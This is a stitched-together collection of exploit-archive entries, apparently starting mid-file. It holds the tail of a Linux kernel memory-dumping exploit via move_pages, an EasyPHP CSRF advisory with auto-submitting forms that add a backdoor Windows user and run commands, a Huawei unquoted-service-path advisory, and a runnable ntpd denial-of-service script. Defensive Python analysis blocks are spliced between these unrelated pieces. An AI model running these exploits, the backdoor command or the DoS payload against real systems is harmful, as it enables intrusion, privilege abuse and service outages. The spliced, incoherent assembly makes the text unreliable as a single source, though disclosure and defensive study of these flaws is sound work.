			   bad addresses and cause an oops
			*/
			if (addr < 0xffffffff80000000)
				addr = 0xffffffff80000000;
#else
			if (addr < 0x80000000)
				addr = 0x80000000;
			else if (addr < 0xc0000000)
				addr = 0xc0000000;
#endif
			addr2 = our_base + 0x10000000;
			f = fopen("./kernel.bin", "w");
			if (f == NULL) {
				fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
				exit(1);
			}

			fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
			fflush(stdout);
			while (addr < addr2) {
				thebyte = get_byte_at_addr(addr);
				fputc(thebyte, f);
				if (!(addr % (128 * 1024))) {
					fprintf(stdout, ".");
					fflush(stdout);
				}
				addr++;
			}
			fprintf(stdout, "done.\n");
			fclose(f);
			break;
		case '2':
			break;
		}
	}

	return 0;
}


int prepare(unsigned char *ptr)
{
	int node;
	int found_gap = 0;
	int i;
	int ret;
	int status;

	totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
	node_states = exp_state->get_kernel_sym("node_states");
	node_online_map = exp_state->get_kernel_sym("node_online_map");

	buf = malloc(4096);

	/* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
	   towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
	   which will be set for our single node -- this gives us the size of the bitmap
	*/
	for (i = 0; i < 512; i++) {
		node = i;
		/* clear errno so a successful probe is not misread as ENODEV */
		errno = 0;
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno == ENODEV) {
			found_gap = 1;
		} else if (found_gap == 1) {
			max_numnodes = i;
			fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
			break;
		}
	}

	if (node_online_map != 0)
		our_base = node_online_map;
	/* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
	   of each bitmap in the array our base is in the middle of
	   we've taken account for all this
	*/
	else if (node_states != 0)
		our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
	else {
		fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
		exit(1);
	}

	return 0;
}

int post(void)
{
	return 0;
}
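The bit-probing that the notes near the top of the sieve source describe, as an added example in Python (not part of the exploit, the framework, or the kernel): it models the unbounded node_isset() test over a constructed memory image, reconstructs bytes outside the bitmap one probe per bit exactly as addr_to_nodes()/get_byte_at_addr() do, and shows that a range check on the node index, which is what the upstream fix added, turns every out-of-range probe into ENODEV. MAX_NUMNODES = 64, the memory contents and the bitmap position are assumptions.

```python
# Added example: user-space model of the unbounded node_isset() check and of
# the bounds-checked version.  Layout and contents are constructed.
import errno

MAX_NUMNODES = 64                  # RHEL 5.4 value from the notes: an 8-byte bitmap
BITMAP_BYTES = MAX_NUMNODES // 8

# Constructed "kernel memory": 256 bytes whose value equals their offset, with
# the node_online_map bitmap placed in the middle.  Only node 0 is online.
KMEM = bytearray(range(256))
BASE = 128
KMEM[BASE:BASE + BITMAP_BYTES] = b"\x01" + b"\x00" * (BITMAP_BYTES - 1)

def node_isset_unchecked(node: int) -> bool:
    """Model of the original test: base[node / 8] & (1 << (node & 7)).
    The index is signed, so node may point before or after the bitmap."""
    byte_index = node >> 3         # arithmetic shift: negative nodes go backwards
    return bool(KMEM[BASE + byte_index] & (1 << (node & 7)))

def node_isset_checked(node: int) -> bool:
    """Hardened test: reject any node outside [0, MAX_NUMNODES) first."""
    if node < 0 or node >= MAX_NUMNODES:
        return False
    return node_isset_unchecked(node)

def move_pages_node_check(node: int, isset) -> int:
    """What the kernel answers for one probe: 0 if the node 'is online', else -ENODEV."""
    return 0 if isset(node) else -errno.ENODEV

def leak_byte(addr: int, isset=node_isset_unchecked) -> int:
    """Reconstruct KMEM[addr] from eight probes, using the exploit's formula
    node = ((addr - base) << 3) | bit and reading 'not ENODEV' as a set bit."""
    value = 0
    for bit in range(8):
        node = ((addr - BASE) << 3) | bit
        if move_pages_node_check(node, isset) != -errno.ENODEV:
            value |= 1 << bit
    return value
```

With the unchecked test, leak_byte() recovers any byte within reach of the signed index; with the checked test, only the bitmap's own bits remain observable.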
            
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/EASYPHP-DEV-SERVER-REMOTE-CMD-EXECUTION.txt

[+] ISR: ApparitionSec



Vendor:
===============
www.easyphp.org



Product:
=============================
EasyPHP Devserver v16.1.1

easyphp-devserver-16.1.1-setup.exe
hash: 64184d330a34be9e6c029ffa63c903de


A complete WAMP environment for PHP development & personal web hosting.
Host with Webserver PHP, Apache, MySQL, Nginx, PhpMyAdmin,
Xdebug, PostgreSQL, MongoDB, Python, Ruby...for Windows.


Vulnerability Type:
=================================
CSRF / Remote Command Execution



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

The EasyPHP Devserver dashboard listens on port 1111. Its PHP code contains
multiple RCE vectors that allow remote attackers to execute arbitrary OS
commands on the target system if a user visits a malicious web page or link.

The "index.php" and "explorer.php" files both contain vulnerable code that
processes RCE requests sent via either GET or POST. The EasyPHP code below
contains no CSRF token or other check whatsoever; all an attacker needs to
supply is the 'type' and command values.

RFI (remote file inclusion) is also possible if the "allow_url_include=0"
setting is changed in the "php.ini" configuration. There are no checks or
CSRF tokens on the PHP include directives either; the default, however, is
set to Off.

e.g. RFI attempt result
Warning: include(): http:// wrapper is disabled in the server configuration
by allow_url_include=0


line 8 of "explorer.php"
======================

//== ACTIONS ==================================================================

if (isset($_POST['action'])) {

    // Include and exec
    if (isset($_POST['action']['request'])) {
        foreach ($_POST['action']['request'] as $request) {
            if ($request['type'] == 'include') include(urldecode($request['value']));
            if ($request['type'] == 'exe') exec(urldecode($request['value']));
        }
    }
    $redirect = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    header("Location: " . $redirect);
    exit;
}


//////////////////////////////////////////////////

line 48 "index.php"
==================


//== ACTIONS ==================================================================

if (isset($_POST['action'])) {

    // Include and exec
    if (isset($_POST['action']['request'])) {
        foreach ($_POST['action']['request'] as $request) {
            if ($request['type'] == 'include') include(urldecode($request['value']));
            if ($request['type'] == 'exe') exec(urldecode($request['value']));
        }
    }
    sleep(1);
    $redirect = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    header("Location: " . $redirect);
    exit;
}

if (isset($_GET['action'])) {
    // Include and exec
    if ($_GET['action'] == 'include') include(urldecode($_GET['value']));
    if ($_GET['action'] == 'exe') exec(urldecode($_GET['value']));
    if (isset($_GET['redirect'])) {
        $redirect = urldecode($_GET['redirect']);
    } else {
        $redirect = 'http://127.0.0.1:1111/index.php';
    }
    sleep(1);
    header("Location: " . $redirect);
    exit;
}
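A detection helper for the two code paths quoted above, as an added example that is not part of the advisory or of EasyPHP: it reconstructs, from a request's query string or POST body, the (type, value) pairs that the dashboard code would hand to exec() or include(). Because the PHP calls urldecode() on values PHP has already decoded once, the helper decodes a second time as well, so what it reports is what would actually run. The request records are constructed; the parameter names are the ones in the code above.

```python
# Added example: flag requests that reach the include()/exec() calls in the
# EasyPHP dashboard code.  Request records below are constructed samples.
from urllib.parse import parse_qs, unquote, urlsplit

DANGEROUS_TYPES = {"exe", "include"}   # the two branches in the dashboard code

def dashboard_actions(method: str, url: str, body: str = "") -> list:
    """Return the (type, value) pairs the quoted PHP would execute or include.

    GET  (index.php only): ?action=exe|include&value=...
    POST (both files):     action[request][N][type]=..., action[request][N][value]=...
    """
    found = []
    if method == "GET":
        params = parse_qs(urlsplit(url).query)
        action = params.get("action", [""])[0]
        if action in DANGEROUS_TYPES:
            # second unquote() mirrors the PHP's urldecode() on an already-decoded value
            found.append((action, unquote(params.get("value", [""])[0])))
    elif method == "POST":
        params = parse_qs(body)
        for key, vals in params.items():
            if (key.startswith("action[request][") and key.endswith("][type]")
                    and vals[0] in DANGEROUS_TYPES):
                value_key = key[:-len("[type]")] + "[value]"
                found.append((vals[0], unquote(params.get(value_key, [""])[0])))
    return found

def flag_requests(records) -> list:
    """records: iterable of (method, url, body); one hit tuple per dangerous action."""
    hits = []
    for method, url, body in records:
        for action, value in dashboard_actions(method, url, body):
            hits.append((method, urlsplit(url).path, action, value))
    return hits

# Constructed request records; the first and third mirror the advisory's PoCs,
# the last carries a doubly-encoded value to show the second decode.
SAMPLE_REQUESTS = [
    ("GET", "/index.php?action=exe&value=calc.exe", ""),
    ("GET", "/index.php?action=show&value=calc.exe", ""),
    ("POST", "/explorer.php",
     "action[request][0][type]=exe&action[request][0][value]=net+user+EVIL+Password+%2Fadd"),
    ("POST", "/explorer.php",
     "action[request][0][type]=include&action[request][0][value]="
     "http%253A%252F%252Fexample.invalid%252Fx.php"),
]
```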




Exploit code(s):
===============

1) Add Backdoor User Account

<form action="http://127.0.0.1:1111/explorer.php" method="post">
<input type="hidden" name="action[request][0][type]" value="exe">
<input type="hidden" name="action[request][0][value]" value="net user EVIL Password /add">
<script>document.forms[0].submit()</script>
</form>



2) Run "calc.exe"

<a href="http://127.0.0.1:1111/index.php?action=exe&value=calc.exe">Clicky...</a>




Disclosure Timeline:
======================================
Vendor Notification: No replies
November 22, 2016 : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
Medium




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
            
# Exploit Title: Unquoted Service Path Vulnerability in Huawei UTPS Software
# Date: Nov 16 2016
# Author: Dhruv Shah (@Snypter)
# Website: http://security-geek.in
# Contact: dhruv-shah@live.com
# Category: local
# Vendor Homepage: http://www.huawei.com/
# Version: Versions earlier than UTPS-V200R003B015D16SPC00C983
# Tested on: Windows XP , Windows 7-10 x86/x64
# CVE: CVE-2016-8769

1. Description

Huawei UTPS Software is the core software bundled with Huawei Internet
dongles, which Huawei supplies to carriers such as Airtel and TATA Photon.
It is the software that installs itself so the dongle can run on the attached
machine. It installs as a service ("Photon. RunOUC" or "Airtel. RunOuc") with
an unquoted service path, running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.

2. Proof of Concept

 ( TATA PHOTON Dongles)
C:\Documents and Settings\Dhruv>sc qc "Photon. RunOuc"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: Photon. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Photon\Huawei\EC306-1\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Photon. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

( Airtel Dongles)
C:\Documents and Settings\Dhruv>sc qc "airtel. Runouc"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: airtel. Runouc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\airtel\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : airtel. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
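The check an auditor would run on `sc qc` output like the two listings above, as an added example (not part of the advisory): it parses the field lines, decides whether BINARY_PATH_NAME is an unquoted path containing spaces, lists the alternative file names Windows may try before the intended executable (one per space in the executable part, as documented for CreateProcess), and produces the quoted value that fixes the service. The Photon listing is reproduced as the sample input; the regular expressions are this example's own.

```python
# Added example: audit `sc qc` output for unquoted service paths.
import re

# `sc qc` output as quoted in the advisory above (wrapped line re-joined)
SC_QC_PHOTON = r"""
SERVICE_NAME: Photon. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Photon\Huawei\EC306-1\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Photon. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text: str) -> dict:
    """Map each 'FIELD_NAME : value' line of `sc qc` output to a dict entry."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]{3,})\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields

def unquoted_path_candidates(binpath: str):
    """None if the path is quoted or the executable part has no spaces; otherwise
    the file names Windows may try before the intended one, in order."""
    if binpath.startswith('"'):
        return None
    m = re.match(r"(.*?\.exe)", binpath, re.IGNORECASE)   # strip any arguments
    exe = m.group(1) if m else binpath
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    return candidates or None

def audit_service(text: str) -> dict:
    """Summarise one service: who it runs as, whether it is vulnerable, the fix."""
    fields = parse_sc_qc(text)
    binpath = fields.get("BINARY_PATH_NAME", "")
    candidates = unquoted_path_candidates(binpath)
    return {
        "service": fields.get("SERVICE_NAME"),
        "runs_as": fields.get("SERVICE_START_NAME"),
        "vulnerable": candidates is not None,
        "ambiguous_paths": candidates or [],
        # corrected value: the path wrapped in quotes (sc config <name> binPath= "\"...\"")
        "fixed_binpath": binpath if candidates is None else '"%s"' % binpath,
    }
```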

3. Exploit:

A successful attempt requires that the local attacker insert an executable
file in the path of the service.
Upon service restart or system reboot, the malicious code will run with
elevated privileges.


Additional notes :

Fixed in version UTPS-V200R003B015D16SPC00C983

CVSSv3 Risk Rating
Base Score: 6.4 (AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H )
Temporal Score:  5.9 (E:F/RL:O/RC:C)

Vulnerability Disclosure Timeline:
=========================
06/09/2016   -   Contact With Vendor
06/09/2016   -   Vendor Response
15/11/2016   -   Release Fixed Version
            
#!/usr/bin/env python3

# Exploit Title: ntpd remote pre-auth Denial of Service
# Date: 2016-11-21
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://dumpco.re/cve-2016-7434/
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz
# Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94
# CVE: CVE-2016-7434

import sys
import socket

if len(sys.argv) != 3:
    print("usage: " + sys.argv[0] + " <host> <port>")
    sys.exit(-1)


# NTP mode-6 control request, sent as raw bytes
payload = b"\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"

print("[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ...")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
sock.close()
print("[+] Done!")
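What the datagram above actually is, as an added example that is not part of the PoC: a decoder for the 12-byte NTP mode-6 control header (the struct ntp_control layout and CTL_OP_* names from ntpd), so such packets can be recognised in captures and matched against an access policy. ntpd itself refuses control queries from sources covered by `restrict ... noquery`; the policy function models that rule. The PoC datagram is reproduced as the sample input, and the mode-3 client packet is constructed.

```python
# Added example: decode and classify NTP mode-6 control packets.
import struct

# Opcode names from ntpd's ntp_control.h (CTL_OP_*)
CTL_OPCODES = {1: "READSTAT", 2: "READVAR", 3: "WRITEVAR", 4: "READCLOCK",
               5: "WRITECLOCK", 6: "SETTRAP", 7: "ASYNCMSG", 8: "CONFIGURE",
               9: "SAVECONFIG", 10: "READ_MRU", 11: "READ_ORDLIST_A",
               12: "REQ_NONCE", 31: "UNSETTRAP"}

def parse_ntp_control(pkt: bytes) -> dict:
    """Return version/mode for any NTP packet; the full header for mode 6."""
    if len(pkt) < 12:
        raise ValueError("too short for an NTP control header")
    li_vn_mode, r_e_m_op, seq, status, associd, offset, count = \
        struct.unpack("!BBHHHHH", pkt[:12])
    info = {"version": (li_vn_mode >> 3) & 7, "mode": li_vn_mode & 7}
    if info["mode"] != 6:
        return info
    info.update({
        "response": bool(r_e_m_op & 0x80),   # CTL_RESPONSE
        "error": bool(r_e_m_op & 0x40),      # CTL_ERROR
        "more": bool(r_e_m_op & 0x20),       # CTL_MORE
        "opcode": r_e_m_op & 0x1f,           # CTL_OP_MASK
        "opname": CTL_OPCODES.get(r_e_m_op & 0x1f, "UNKNOWN"),
        "sequence": seq, "status": status, "associd": associd,
        "offset": offset, "count": count,
        "body": pkt[12:12 + count],
        # a count that disagrees with the datagram length is itself worth flagging
        "count_mismatch": len(pkt) - 12 != count,
    })
    return info

def should_drop(pkt: bytes, trusted_source: bool) -> bool:
    """Policy: mode-6 requests (not responses) are dropped unless the source is trusted,
    which is the effect of `restrict default noquery` in ntpd."""
    info = parse_ntp_control(pkt)
    return info["mode"] == 6 and not info.get("response", False) and not trusted_source

# The PoC datagram above, copied here as the sample, plus a constructed
# ordinary mode-3 client request for comparison.
POC_PAYLOAD = (b"\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36"
               b"nonce, laddr=[]:Hrags=32, laddr=[]:WOP\x002, laddr=[]:WOP\x00\x00")
CLIENT_PACKET = b"\x23" + b"\x00" * 47
```

For the PoC datagram the decoder reports NTP version 2, mode 6, opcode 10 (READ_MRU), a count of 54 that does not match the 56 data bytes actually sent, and a body beginning with the text "nonce, laddr=[]:".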